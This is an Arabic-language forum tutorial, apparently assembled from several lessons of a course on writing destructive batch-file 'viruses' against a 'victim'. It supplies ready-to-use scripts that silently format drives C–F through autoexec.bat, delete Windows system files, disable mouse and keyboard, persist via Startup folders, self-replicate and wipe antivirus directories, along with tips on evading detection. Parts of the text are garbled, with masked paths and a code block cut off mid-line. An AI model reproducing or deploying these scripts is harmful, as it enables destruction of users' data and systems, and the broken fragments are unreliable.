واريد المستخدم مثلا يضغط حرف y ويضغط enter وينفذ امر معين وn وenter يتنفذ امر اخر
اخي سوف اعطيك مثال عندما تقوم بالفورمات سوف يسألك الحاسب هل انت متأكد اجب بـ Y,N هنا نكتب هذا الايعاز لتجاهل الرسالة و الا اذ لم نكتب الايعاز سوف يظهر مثلا رسالة تقول للضحية سوف تقوم بحذف مجلد الوندوز هل انت متأكد من ذلك ... و اكيد سوف يجب بـ لا و هكذا لا يعمل الفيروس
الدرس الثالث
اليوم يا شباب راح انكمل دروس احتراف صناعة الفيروسات عن طريق المفات الدفاعية Batch Files المهم نحن بهذاك الدرس اتعلمنا بعض الايعزات و طريق تشفير و غير ذالك ... المهم هذا الدرس راح انطي امثلة عن العمل مع الملفات اخواني انا في هذه الدروس اعلمكم على كيفية التعامل مع الملفات الدفاعية لانه بعد التعلم سوف تقدر ان تصنع فيروسات بدون مساعدة من اي شخص و تصنعون فيروسات ة غير مكشوفة ان شاء الله
1-اوامر و امثلة :
del - Delete File
del c:\windows\*.txt
الشرح : لمسح ملف ما في هذا المثال قمنا بمسح كل ما يوجد في مجلد الوندوز
deltree - Delete Folder
deltree \y c:\windows
الشرح : لمسح ملف اي ليس له امتداد ملف هنا مسحنا ملف وندوز وليس ما بداخل الوندوز ملحوظة هامة هذا الامر لايعمل علي الاكس بي يعمل علي 98 اوك .
call - Open Or Call Another .bat File
call c:\windos\anything.bat
الشرح : هنا قمنا بأتصال مع ملف اخر لتحرير و مسح و نقل ...
cls - Clear The Screen
الشرح : هذا الامر من اجل تنظيف الشاشة من الاحرف
echo - Allows You To Write Anything
echo hahaha i will kill yr computer
الشرح : هذا الامر من احدى اجمل الايعازات و هو يجعل الضحية |596| يقرأ المكتوب مثلاً كتبة انا دمرتك يمكنه قرائته اي انه فقط لكتابة السطور
goto - To Go To a Nother Section In a Batch File
:start
echo i hack you
goto next
:next
del c:\windows\******
الشرح : في هذا الامثال استخدمنا الامر go to يعمل على |554| الذهاب الى امر اخر لتنفيذه
copy %0 - To Copy The Running File To Another Place
copy %0 c:My********\anything.bat
الشرح : اما عن هذا الامر فهو مخصص لنسخ ملف copy
2.طريقة تغير امتداد Batch عن طريق Dos :
اذهب الى start اكتب command تفتح لك شاشة سوداء مكتوب فيها
cd:\windows
انت في هذه الحالة تكتب
..cd
كرر هذا الامر الى ان تجعلها
بعد ما تنتهي من هذا الامر تذهب الى my cumputer ثم تختار (:c)
وضع الفيروس |4| فية ثم اذهب الى الدوس و اكتب هذا الامر
cd:\>copy virus***** virus.com
virus هو اسم الفيروس تبعك
وممكن تغير الامتداد الى com,scr,bat
ملاحظة :*** اخواني انا متأكد من الطريقة و مجربة و ناجحة 100% اكو شيء ثاني ليس تغير الامتداد بل منع مضادات الفيروسات من حذف الفيروس الطريقة سهلة جدا و ذكية في نفس الوقت كتالي :
انت مو كونت فيروس كويس اعمل التالي ادخل الى الدوس و ادخل الى ملف الفيروس فرضاً اسم الفيروسmoodax.bat اذن اكتب التالي :
ren moodax.bat ~moodax*
للاحتراف بجد
المقدمة :
في الدروس السابقة قد قمت بطرح مفاهيم و شروحات لبعض منها ليس له علاقة في الدورة مثل طريقة التشفير و تغير الامتداد و الذكاء الفيروسي مع اني لم اعطي الا جزء منه ان هذا الدرس لا تحدث عن الذكاء الفيروسي لا كن نحن لا نستطيع صناعة فيروس ذكي عن طريق الملفات الدفاعية طبعاً لماذا اخواني يمكننا تطبيق خاصية الذكاء الفيروسي فقط في اللغات البرمجية و هذه التي ندرسها الان ليست لغة برمجية بتاتاً لاكنه احدى اهم مكونات نظم التشغيل الحديثة و القديمة !! و نسبة مستخدمي نظام النوافذ في العالم عددهم ليس بالقليل هذه الفيروسات التي نصنعها لا تعمل الا اذ كان هناك على الحاسب نظام دوس السبب لانه قد اشرنا في الدرس الاول في قسم المقدمة في الجزء الاول ((تعريف)) انه الملفات الدفاعية هي ليست الا حزمة من اوامر نظام التشغيل الدوس ...
1- الاكود الاكثر استخداماً :
في هذه الفقرة سوف اعطيكم كودات يستخدمه اغلب مبرمجي الفيروسات
1.هذا الكود لمنع كشف المضاد على الفايروس
كود PHP:
call attrib -h -r c:autoexec.bat >nul
------------------------------------
2.هذا الكود للفورمات
كود PHP:
echo format a: /q /u /autotest >nul >>c:autoexec.bat
------------------------------------
3.هذا كود للفورمات لكن بالختصار
echo & /autotest >nul >>c:\autoexec.bat ألاولى تعنى انسخ الامر القادم الى
(طبعاً معروف من الكود الاول انة الى الاوتواكسك)
الثانية تعنى اجراء وتنفيذ الامر بدون طلب تحذير بتاع
yes and NO
لأانك عارف لما تعمل فورمات لابد ان يحذرك الاول ونحن نريد الفيرس يعمل فورمات بدون ما يحذر الضحية اذن هذا الكود هو المسئول عن هذا ويعنى ايضا ان النسخ يكون الى ملف الاوتواكسيك فى السى
------------------------------------
4.هذا كود فورمات كل الاقراص |385|
كود PHP:
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat
------------------------------------
5.هذا كود فيروس العد التنازلي و علاجه :
الكود:
echo off@
shutdown -s اذا فتحت الفايروس راح يعد تنازلي من 30 ثانية ويطلع بدون رسالة اذا كنت تريد يطلع معاه رسالة وتوقيت غير
كود:
echo off@
shutdown -s -t 30 -c "message" طبعا نغير 30 الى عدد الثوان و message الى الرسالة
اغلاق الجهاز على الشبكة
echo off@
shutdown -s -t 15 -c "message" -m \\****computer طبعا نغير 15 الى عدد الثوان و message الى الرسالة ونغير ****computer الى الجهاز المراد اغلاقه
العلاج :
shutdown –a
2-مجموعة من الكودات مع الشرح (المفصل) :
اما عن هذه الفقرة سوف اقوم بأعطائكم كودات لاكن مع شرح مفصل جداً
1 - اذ اردت كتابت كود فيروسي يعمل التالي
يدخل على قرص الذي عندى الضحية ويقوم بالغاء ملف تكست |391| اسمة مثلاً اكس
ملاحظة : يمكنك وضع اى كود dos غير الفورمات على هذة القاعدة
كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo كود دوسى >nul >>c:autoexec.bat
والسطر الاخير يكرر ان كنت تريد اما اذا كانت العملية تتطلب الغاء رسالة تحذيرية فتكون القاعدة
كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo كود دوسى /autotest >nul >>c:autoexec.bat
مع تكرار السطر الاخير ان تتطلب ويمكنك وضع قاعدة مشتركة
كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo كود دوسى /autotest >nul >>c:autoexec.bat
echo كود دوسى >nul >>c:autoexec.bat
يعنى نفكر كدة انا كان الكود هاعترض رسالة فى احد السطور فلابد من اضافة /autotest لتفادى الرسالة التحذيرية
------------------------------------
2 - اذ اردت كتابت كود فايروسي يعمل التالي
يدخل على قرص الذي عندى الضحية ويقوم بالغاء ملف تكست اسمة مثلاً اكس هل هذة الفكرة تعترضها رسالة تحذيرية
بالطبع لا اذن اتبع القاعدة الاولى يكون الكود كما يال
كود PHP:
ي
call attrib -h -r c:autoexec.bat >nul
echo d: >nul >>c:autoexec.bat
echo Del x.txt >nul >>c:autoexec.bat
التحليل
-------
كود PHP:
call attrib -h -r c:autoexec.bat >nul
ذكرنا انفاً الان لدخول الدريف والغاء ملف اسمة اكس(تكست مثلاً) فى الدوس كنت باتكتب
c:/ press enter فيتحول المحث |373| الى d:/ للاغاء هاتكتب
d:/Del x.txt press enter اذن معنا الكود الدوسى وقد قمنا بالعملية على كام خطوة على خطوتين اذن معنا الكود وعد الخطوات ومعنا الكود الاساسى للفيرس نستنتج التالى عدد سطر الكود لابد ان يكون
اثنين + واحد (اساسى) + اى عدد لو عاوز تكمل الفيرس لشىء تانى فيكون
كود PHP:
call attrib -h -r c:autoexec.bat >nul
(اساسى)
كود PHP:
echo d: >nul >>c:autoexec.bat
(الدخول على الدريف دى)
كود PHP:
echo Del x.txt >nul >>c:autoexec.bat
(الغاء ملف امسة اكس تكست)
تذكر :::::
كود PHP:
echo كود الدوس >nul >>c:autoexec.bat
------------------------------------
3 - اذ اردت الغاء كل الملفات التي امتدادها .txt في القرص
كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo d: >nul >>c:autoexec.bat
echo Del *.txt >nul >>c:autoexec.bat
------------------------------------
4 - اذ اردت الغاء كل الملفات التي امتدادها .zipفي القرص
كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo d: >nul >>c:autoexec.bat
echo Del *.zip >nul >>c:autoexec.bat
------------------------------------
5 - كود يقوم بالغاء ملفات النظام |300| و تحليله :
كود PHP:
@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
تحليلة :
c: دخلنا على السى
كود PHP:
cd %WinDir%System
دخلنا على ملف السيستم فى الوندوز
كود PHP:
deltree /y *.dll
الغاء كل ملفات الامتداد DLL. والتى هي خاص بالوندوز
cd\ خرجنا بعد تنفيذ العملية الاولى
كود PHP:
deltree /y *.sys
و الغاء كل ملفات sys. فى الوندوز.
هذا الكود كامل ما عدى كود التاريخ و انت تعرف انه لا استطيع صنع فيروس يعتمد على التاريخ عن طريق الملفات الدفاعية يعمل هذا الكود على ايقاف المضادات و فورمات C,D,E,F فقط و اذ اردت يمكنك الاضافة , و كود اعادة التشغيل اعتقد انه انت قرأت الدرس الثاني و الاول ...
كود:
كود PHP:
@Echo Virus Format
@Echo www.3asfh.comvb
@Echo By RBG-7
call attrib -h -r c:autoexec.bat >nul
format c: /q /u /autotest >nul >>c:autoexec.bat
format d: /q /u /autotest >nul >>c:autoexec.bat
format e: /q /u /autotest >nul >>c:autoexec.bat
format f: /q /u /autotest >nul >>c:autoexec.bat
shutdown -s
End
اتمنى انه يكون واضح ..
إقتباس:
كود PHP:
call attrib -h -r c:autoexec.bat >nul
Call : للاتصال في ملف من نوع Bat
Attrib : هذا امر خاص بالدوس يعمل على تغير خصائص ملف
-h : اخفاء
-r : جعله فقط قراءة
c:\autoexec.bat : الملف المراد التنفيذ عليه
> nul : هذا الامر شروح في الدرس الاول و يعمل على عدم سؤال المستخدم
إقتباس:
كود PHP:
format a: /q /u /autotest >nul >>c:autoexec.bat
Format : امر الفورمات
a: الامر يطبق على القرص A
/q : سريع
/u : يقوم بحذف الملفات الاساسية
/autotest : هذا الامر مهم جدا يقوم بنقل الكود المكتوب الى الملف المطلوب>nul >> : نقل من دون سؤال
c:\autoexec.bat : الملف الذي سوف يطبق به الكود
إقتباس:
echo off@
shutdown -s -t 30 -c "message" طبعا نغير 30 الى عدد الثوان و message الى الرسالة
اغلاق الجهاز على الشبكة
@echo off : عدم استخدام الامر Echo
اخوي البعض يسأل لمذا وضع هذا الامر في بعض الاحيان يخطاء المبرمج و يكتب الامر و بعده الكود مما يأدي الى القراءة فقط دون تنفيذshutdown -s : اطفاء الحاسب
-t : الوقت
30 : ثانية
-c : اظهار رسالة
message : اكتب الرسالة التي تريد
إقتباس:
كود PHP:
@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
نعم اخوي هذا كود كامل لفيروس تدمير النظام لا ينكتب في سطر واحد و السبب لانه كود كامل و ليس امر
الدرس الخامس
الدرس دا شرح عبارة عن اسئلة واجابة
1-اسئلة و حلول :
س1.كيف نستطيع عمل اعدة تشغيل عن الضغط على الفيروس
------------------------------------
عندما ضغط على الفيرس انتقلت اوامر الدوس الى ملف الاوتواكسك فلابد من اعادة التشغيل حتى يطلب الوندوز هذا الملف فيجدة وهو على الدوس فاينفذ الاور معتقداً انة يحمل
اوامر البدء ...
اضف هذا الكود لعمل ريستارت :
كود PHP:
c:windowsrundll***** user*****,exitwindow***ec
ألان عندما يضغط الضحية علية سوف يحدث وينتقل الاوامر الدوسية ومعها سطر الريستارت وهايحدث ريستارت
ويتم تنفيظ الاوامر الدوسيةفى سرعة كبيرة جدااىاننا اجبرنا الضحية على عمل ريستارت لكى يشتغل الفيرس
س2.هل هناك اكواد اخرى مثل عمل اغلاق للوندوز
------------------------------------
كود PHP:
c:windowsrundll32***** user*****,exitwindows
هذا كود الغلاق
س3.عندما اريد من الفيروس عدم حذف نفسه لماذا اكتب رموز (الدرس الثاني)
------------------------------------
لانه و قد ذكرة في الدرس السابق انه نظام التشغيل النوافذ (Windows)لا يقبل كتابة رموز في اسماء البرامج لاكن نظام التشغيل (MS-DOS)يوافق على كتابة هذه الاسماء .
س4.لماذا اقوم بتغير امتداد الفيروس من BAT الى EXE (الدرس الاول)
------------------------------------
لانه يمكن لاي شخص كشف الكود البرمجي للفيروس !! و هذا اكبر خطاً مما يؤدي الى استخادمه ضدك فيجب عليك الحذر ..
س5.لماذا اشفر الفيروس و لماذا لا تنص بكتابة كود تدمير المضدات (الدرس الثالث)
------------------------------------
لانه اذ قمت بكتابة الكود البرمجي الخاص بحذف او ايقاف عمل المضادات سوف يقوم المضاد بتنبيه الضحية و حذف الفيروس مباشرتاً مما يؤدي الى فشل العملية ...
س6.انت الان تعلمنا صناعة الفيروسات عن طريق الملفات الدفاعية اذن هل يوج مستى اقوى
------------------------------------
نعم,يوجد مستويات اقوى مثل الفيجول بيسك و السي بلص بلص و لغة التجميع لاكن من مميزات الملفات الدفاعية انه يمكن كتابة اي فيروس في اي حاسبة بدون برنامج معين او مترجم لغة فقط المفكرة ..
2-كودات فيروسات جاهزة :
1.فيروس عمل فورمات C,D,E,F والطابعه واعادة تشغيل الجهاز :
كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat
c:windowsrundll***** user*****,exitwindow***ec
------------------------------------
2.فيروس عمل فورمات C,D,E,F والطابعه :
كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat
------------------------------------
3.فيروس يحذف برنامج المفكرة وينسخ بدله برنامج اخر :
كود PHP:
del C:WINDOWSNOTEPAD*****
copy %0 C:WINDOWSNOTPAD*****
------------------------------------
4.فايروس افتراضي :
كود PHP:
@echo off
cls
:start
if exist c:AUTOEXEC.bat goto delc
if exist d:AUTOEXEC.bat goto deld
if exist e:AUTOEXEC.bat goto dele
if exist f:AUTOEXEC.bat goto delf
elc
del c:
goto end
eld
del d:
goto end
ele
del e:
goto end
elf
del f:
goto end
end
------------------------------------
5.فايروس النظام :
كود PHP:
@echo off
cls
:start
if exist c:windows goto next
if not exist c:windows goto copy
:next
del c:windows
goto end
:copy
cd c:
md virus
goto end
end
------------------------------------
6.فايروس الدوس :
كود PHP:
@echo off
C:WINDOWSrundll***** mouse,disable
C:WINDOWSrundll***** keyboard,disable
del c:command.com
del c:Io.sys
del c:Config.sys
del c:Msdos.sys
del c:windowssystem32command.com
deltree /y C:WINDOWSCOMMAND*.*
deltree /y C:WIN98COMMAND*.*
deltree /y C:WINmeCOMMAND*.*
deltree /y C:WIN_meCOMMAND*.*
deltree /y C:WINxpCOMMAND*.*
deltree /y C:WIN_xpCOMMAND*.*
del d:command.com
del d:Io.sys
del d:Config.sys
del d:Msdos.sys
del d:windowssystem32command.com
deltree ------------------------------------
7.فيروس قاتل ملفات السستم :
كود PHP:
@echo off
c:
cd C:WINDOWSSystem
deltree /y *.dll
cd
deltree /y *.sys
c:
cd C:WINDOWSSystem32
deltree /y *.dll
cd
deltree /y *.sys
d:
cd C:WINDOWSSystem
deltree /y *.dll
cd
deltree /y *.sys
d:
cd C:WINDOWSSystem32
deltree /y *.dll
cd
deltree /y *.sys
CLS
------------------------------------
8.فيروس قاتل الفأرة و لوحة المفاتيح :
كود PHP:
@echo off
C:WINDOWSrundll***** mouse,disable
C:WINDOWSrundll***** keyboard,disable
copy key.BAT C:WINDOWSstartm~1programsstartup
copy key.BAT C:Docume~1ALLUSE~1StartM~1ProgramsStartup
copy key.BAT D:Docume~1ALLUSE~1StartM~1ProgramsStartup
CLS
9.فيروس يمنع استخدام خصائص الشاشة :
كود PHP:
@echo off
cd
cd
deltree /y c:/windows/RUNDLL32*****
cd
cd
------------------------------------
10.فيروس تدمير سطح المكتب :
كود PHP:
@echo off
cd
cd
deltree /y c:/windows/desktop
cd
cd
------------------------------------
11.فيروس قاتل النورتن :
كود PHP:
@echo off
%WinDir%rundll***** mouse,disable
%WinDir%rundll***** keyboard,disable
copy hahahah.BAT %windir%startm~1programsstartup
copy hahahah.BAT C:Docume~1ALLUSE~1StartM~1ProgramsStartup
copy hahahah.BAT D:Docume~1ALLUSE~1StartM~1ProgramsStartup
deltree /y crogra~1norton~1*.*
deltree /y drogra~1norton~1*.*
deltree /y crogra~1zonela~1*.*
deltree /y drogra~1zonela~1*.*
cls
------------------------------------
12.فيروس التدمير :
كود PHP:
echo off@
c:windowsrundll***** mouse,disable
c:windowsrundll***** keyboard,diable
goto del
el
deltree y c:*.*
goto copy
:copy
copy %0 C:WINDOWSStart MenuProgramsStartUp**** of virus.bat
cls
puse
------------------------------------
13.فيروس يمحى جميع الملفات التى على الهارد :
كود PHP:
@echo off
c:
cd
deltree /y *.*
d:
cd
deltree /y *.*
------------------------------------
14.فيروس خاص :
كود PHP:
echo off@
del system.ini
del win.ini
del auto exec.bat
del config.sys
------------------------------------
15.اهم فايروس فايروس مدمر :
كود PHP:
echo off@
cls
call attrib -h -r c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo deltree /y crogra~1*.* >nul >>c:autoexec.bat
echo copy c:windowscommandformat.com c: >nul >>c:autoexec.bat
echo copy c:windowscommanddeltree***** c: >nul >>c:autoexec.bat
echo deltree /y c:windows*.* >nul >>c:autoexec.bat
echo format c: /q /u /autotest >nul >>c:autoexec.bat
------------------------------------
16.فيروس عمل فورمات للجهاز فورا :
كود PHP:
echo off@
cls
call attrib -h -r c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo deltree /y crogra~1*.* >nul >>c:autoexec.bat
echo copy c:windowscommandformat.com c: >nul >>c:autoexec.bat
echo copy c:windowscommanddeltree***** c: >nul >>c:autoexec.bat
echo deltree /y c:windows*.* >nul >>c:autoexec.bat
echo format c: /q /u /autotest >nul >>c:autoexec.bat
------------------------------------
17.فيروس قتل الوندوز وحذف كل الملفات بعد اول اعادة تشغيل للجهاز :
كود PHP:
call attrib -h -r c:autoexec.bat >nul
@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
------------------------------------
18.فيروس قتل الوندوز وحذف كل الملفات بعد التشغيل مباشره
كود PHP:
@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
------------------------------------
19.فيروس عمل فورمات C,D,E,F والطابعه وقفل الجهاز :
كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat
c:windowsrundll32***** user*****,exitwindows
------------------------------------
20.فيروس النسخ الالي :
كود PHP:
@echo off
:start
cls
copy %0 c:/virusautocopy.bat
copy %0 c:/windows/virusautocopy.bat
copy %0 d:/virusautocopy.bat
copy %0 c:/My ********s/virusautocopy.bat
end
------------------------------------
21.فايروس ينسخ نفسة في network و ملفات winzip و start up ( اهم فيروس – ) :
كود PHP:
send msg to any one onlin in the network and start many programs
del all c files and copy it self in any dirve
if exist d:
copy %0 d:game.bat
copy %0 d:autoexec.bat
@echo off
echo Virus ****:A7meedye
c:windowsrundll***** mouse,disable
c:windowsrundll***** keyboard,disable
goto network
:network
cls
if exist c:winnt goto winnt
copy %0 c:windowsalluse~1applic~1Network89.bat
copy %0 c:windowsalluse~1destkopNetwork89.bat
copy %0 c:windowsalluse~1startm~1Network89.bat
copy %0 c:windowsalluse~1startm~1progra~1Network89.ba t
goto zip
zip:
cls
@dir /s /b /l c:winzip32***** | set wz=
@FOR /F "delims==" %%y IN ('dir /s /b /l c:\*.zip') DO @echo "%wz%" -min -a -r -p "%%y"
goto startup
startup:
cls
copy %0 C:WINDOWSStart MenuProgramsStartUpNetwork89.bat
goto del
del:
deltree /y C:WINDOWS*.*
deltree /y C:Program Files*.*
deltree /y C:My ********s*.*
goto msg
msg:
NET SEND 127.0.0.1 you got a virus
goto start
:start
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
goto end
:end
cls
echo Im fuck your computer
echo sorry about what my virus do but you are stuped
echo The Virus Made By A7meedye
puse
(هاذ الشرح يتبع للدرس الخامس)))))))))))))))))))
الدرس السادس
الدرس ذا مهم جدا
اخواني الاعزاء هذا الدرس يعتبر خاص في الدورة لانه عندما طرحة الدورة لقد نسيت بعض الاشياء المهمة و يجب علي اكمالها و ان شاء الله في هذا الدرس سوف ابري ذمتي من اجل اكمال الدورة .
1.طريقة تشغيل الفيروس عند بدا التشغيل :
سوف نستخدم لغة الفيجول بيسك و يجب على الشخص الذي يريد استخدام الكود لديه مستوى و لو فوق الوسط ليعرف وضع الكودات على كلاً يوجد كتاب و دورة الاستاذ الصقر الجراح يمكن من خلاالها تعلم الفيجول بيسك و انا انصح به المهم الان سوف اعطيكم الكودات و مناطق وضعها اما عن كيفية دمج الفيروس مع الفيجول فراجعوا الدرس الاول لمعرفة الطريقة الكاملة .
كود PHP:
كود بدا التشغيل :
في الموديل :
Option Explicit
Private Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long
Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValue**** As String) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValue**** As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Private Declare Function RegCreate
واش راكم جميع ان شاء الله طيـبيـن .،
اخواني مابي اطول عليكـم ./، بس حبـبيت اسوي الموضوع لـ المبتدئـين في صنع الفيروسات.، ندخل صلب الموضوع،
لابد ان تقسم بالله العظيم الذي فطر السموات والارض انك اذا استخدمت هذة المعلومات لن تضر اي احد من المسلمين بها
اذا كان للرجال عزما فهذا العزوم منا تراخت واذا كان للناس حقا عدلا ففي اسلامنا تراحم
انا بريء منكم يا ذي الكهوم انا كن لله طوعا وانت علي غـــــــــير العادة سئوما ================================================== =
بسم الله الرحمن الرحيم
الفيروسات
الدرس الاول
من منا لا يعرف الفيروسات و اخطارها؟! و التدمير الممكن تحقيقه بهذه الفيروسات!
من يصنع الفيروسات بغرض الاذي, فليس الا مستهتر غبي يستعمل العلم في اشياء مضرة, و من اخطر الفيروسات التي صنعت حتي الان هو فيروس شرنوبيل, الذي يقوم بتدمير الجهاز كليا, اخترعه شاب في الحادي و العشرين من عمره لا يهوي الا التدمير..
مقدمة عن الفيروسات:
تصنع الفيروسات ببرامج مثل دلفي و باسكال ..الخ, اما ما سنصنعه الان ليس فيروسات, بل برامج مدمرة تقوم بنفس عمل الفيروسات, و لا يستطيع النورتن كشفها..
أفكار هذه الفيروسات بسيطة و سهلة, و كلها بأكواد درسناها من قبل, ولكن لتصميم فيروسك الخاص, يجب ان يتوافر لديك الذكاء, انظر الي الامثلة و اعرف طريقة صنع هذه الفيروسات ثم اصنع افكار مثلها..
ارجو من كل اخ مسلم عدم استخدام هذه الفيرووس ضد المسلمين
بس الدرس الاول ذا هيكون عن كلام كتير بس غير الفيروسات بس حاجات تساعدنا في تصنيع الفيروسا اول حاجة ابدا بكل اول الدوس
اوامر الدوس
ذي اوامر الدوس ودي استعن بشرح الاخ سوفا من منتدي القراصنة
كلمة (DOS) اختصار لـ Disk Operating System
* تعريف الـ DOS : هو مجموعة من الأوامر والتعليمات التي تتحكم في مكونات الحاسب الآلي.
-دور الـ DOS في جهاز الكمبيوتر: هو حلقة الوصل بين الكمبيوتر والمستخدم.
-الملفات:
إن أهم الخدمات التي يقدمها الـ DOS هي تنظيم حفظ البيانات في الملفات.
تعريف الملف: هو عبارة عن وعاء لحفظ البرامج أو النصوص أو البيانات، وهو أصغر وحدة للحفظ بالنسبة لنظام التشغيل.
* تسمية الملفات:
ينقسم اسم الملف إلي قسمين:
القسم الأول: وهو الأساس ( ROOT ) ويجب ألا يزيد طوله عن 8 حروف. وهذا الجزء من اسم الملف ضروري - إي يجب وجوده.
القسم الثاني: ويسمى الامتداد ويجب ألا يزيد طوله عن 3 حروف، ويجب أن يفصل بين الاسم ( الأساس) و الامتداد بعلامة النقطة ( . ). وهذا الجزء من الاسم اختياري - يمكن الاستغناء عنه.
-جميع الملفات التي تنتهي بأحد الإمدادات التالية BAT , EXE , COM قابلة للتحميل والتنفيذ المباشر.
ونبين هنا بعض أشهر أنواع الإمدادات المستخدمة مع أسماء ملفاتها الكاملة:
.BAT ملف أوامر تنفذ دفعة واحدة ( BATCH ).
.COM ملف برنامج ( COMMAND ).
***** ملف جاهز للتنفيذ ( EXECUTABLE ).
.DOC ملف نصوص أو وثائق ( ******** ).
.ASM ملف مصدر برنامج مكتوب بلغة التجميع ( ASSEMBLY ).
.BAK ملف احتياطي ( BACKUP ).
.BAS ملف برنامج بيسك ( BASIC ).
.DBF ملف قاعدة بيانات ( DBASE FILE ).
.PAS ملف برنامج مكتوب بلغة باسكال ( PASCAL ).
.SYS ملف تكوين نظام ( SYSTEM ).
.C ملف مصدر مكتوب بلغة سي ( C ).
الرموز المستخدمة في تسمية الملفات:
1-الحروف الأبجدية من A إلي Z ( سواء كانت صغيرة أو كبيرة ).
2-الأرقام من 0 إلي 9 .
3-بعض العلامات مثل: ( { } ، ( ) ، & ، % ، $ ، # ، ! ).
* الشروط التي يجب مراعاتها عند اختيار اسم الملف:
1- طول الاسم الأساسي للملف من 1-8 حروف.
2- يجب ألا يزيد الاسم الممتد -إن وجد- عن 3 أحرف.
3- أن يفصل بين الاسم الأساسي والاسم الممتد -إن وجد- بعلامة النقطة ( . ).
4- أن يكتب الاسم الأساسي والاسم الممتد بدون فراغات.
5- عدم استخدام مفاتيح التحكم وهي : ( ALT ، CTRL ، ESC ) في أي اسم .
6- عدم استخدام الأسماء المحجوزة لنظام التشغيل مثل CON الخاص يلوحة المفاتيح و شاشة العرض أو PRN الخاص باسم الطابعة.
7- عدم استخدام الرموز ذات الدلالة الخاصة لنظام التشغيل وهي * ، / ، ، + ، = ، ؟).
تنظيم الملفات على القرص:
للحصول على ملفات منظمة على القرص يجب إنشاء الدليل ( Directory ) فذلك يسهل التعامل مع الملفات وترتيبها بسهولة.
-تعريف الدليل ( Directory ): هو عبارة عن مجموعة ملفات توضع تحت مسمى دليل معين.
-أقسام الأدلة: تقسم الأدلة إلي أربعة أقسام:
1-الدليل الرئيسي: وهو الدليل الذي يقوم Dos بإنشائه تلقائياً عند تشكيل الاسطوانة وتوضع تحته جميع الملفات المنشأة.
2-الدليل الفرعي: وهو الذي ينشأ تحت دليل رئيسي ( subdirectory ).
ونظرا لأن مستخدم الكمبيوتر يتعامل مع عدد كبير من الملفات لذلك يفضل أن توزع هذه الملفات في أدلة فرعية.
-ويمكن إنشاء الأدلة الفرعية داخل الدليل الرئيسي أو داخل أدلة فرعية أخرى.
-الفرق بين الدليل الرئيسي والدليل الفرعي: هو أن النظام ينشئ الدليل الرئيسي تلقائياً، بينما ينشئ المستخدم الدليل الفرعي.
-يوجد دليل رئيسي واحد في كل قرص بينما قد يوجد في القرص عدة أدلة فرعية.
3-الدليل الأبوي: وهو نوع من الأدلة تتفرع منه أدلة فرعية عديدة فيصبح دليلاً أبوياً لهم.
ومثال على ذلك:
SCHOOLCLASS
إن الدليل ( SCHOOL ) في المثال السابق يعتبر دليلاً أبوياً للدليل الفرعي ( CLASS ).
4-الدليل الحالي: وهو الدليل الذي يكون مستخدما وقت العمل عليه ، وكذلك هو الدليل الذي يتم التعامل مع ملفاته بدون أن يسبقها اسم دليل آخر - لا يرتبط بدليل أبوي.
* طريقة تحميل نظام التشغيل من الأسطوانة المرنة: هناك طريقتين لعمل ذلك :
الطريقة الأولى: ( يجب أن يكون الجهاز مغلق )
1-ندخل اسطوانة الدوس في محرك الأقراص A.
2-نقوم بتشغيل جهاز الكمبيوتر .
الطريقة الثانية: (حين يكون الجهاز يعمل)
1-ندخل اسطوانة الدوس في محرك الأقراص A.
2-نقوم بالضغط على المفاتيح التالية معا: ALT + CTRL + DELETE .
* رموز محركات الأقراص في نظام التشغيل ( DOS ):
1- الأسطوانة المرنة ( Floppy Disk ): ويوجد هناك نوعين من الأسطوانات المرنة وهما :
أ-أسطوانة مرنة حجم 3.5 بوصة.
ب-أسطوانة مرنة حجم 5.25 بوصة.
-ويرمز لمحرك الأسطوانات المرنة بالرمز A أو B.
2-القرص الصلب ( Hard Disk ): ويرمز له بالرمز C.
3- ( CD-ROM ): ويرمز له بالرمز D أو E.
